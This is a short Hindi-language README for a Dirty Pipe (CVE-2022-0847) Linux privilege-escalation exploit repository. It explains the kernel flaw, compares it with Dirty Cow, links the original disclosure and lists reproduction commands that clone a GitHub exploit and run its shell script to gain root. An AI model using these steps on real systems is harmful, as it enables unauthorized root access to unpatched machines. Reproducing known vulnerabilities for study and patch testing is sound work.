
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 Linux कर्नेल 5.8 और उसके बाद के संस्करणों में मौजूद एक लोकल प्रिविलेज एस्केलेशन भेद्यता है। हमलावर इस भेद्यता का उपयोग करके किसी भी पठनीय फ़ाइल में डेटा को अधिलेखित कर सकता है, जिससे सामान्य विशेषाधिकार वाले उपयोगकर्ता को विशेषाधिकार प्राप्त रूट तक उन्नत किया जा सकता है। CVE-2022-0847 की भेद्यता का सिद्धांत CVE-2016-5195 डर्टी काउ (Dirty Cow) भेद्यता के समान है, लेकिन इसका शोषण करना अधिक आसान है। भेद्यता के लेखक ने इस भेद्यता को "Dirty Pipe" नाम दिया है।
CVE-2022-0847 सरल पुनरुत्पादन
प्रकटकर्ता के मूल लेख का पता: https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
